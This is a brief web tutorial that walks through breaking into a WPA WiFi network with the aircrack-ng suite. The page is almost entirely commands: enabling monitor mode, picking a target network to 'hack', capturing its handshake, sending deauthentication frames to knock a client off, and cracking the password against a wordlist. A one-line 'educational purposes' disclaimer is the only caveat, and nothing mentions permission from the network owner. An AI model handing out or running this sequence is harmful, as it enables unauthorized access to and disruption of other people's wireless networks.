Hacking WiFi using aircrack-ng

Hacking WiFi using aircrack-ng
Disclaimer: Everything on this site is for educational purposes and should not be used for evil.
You will need:
airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
Tutorial:
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon
Choose a WiFi you want to hack
Capture a handshake:
airodump-ng -c [Channel] --bssid [BSSID] -w WPA wlan0mon
To speed up the process, deauth a client:
aireplay-ng —deauth 100 -a [BSSID] -c [Client MAC] wlan0mon
If you didn't capture it, try again after some time.
Then crack the handshake using aircrack-ng:
aircrack-ng -w [path to wordlist] -b [BSSID] WPA.cap

Comments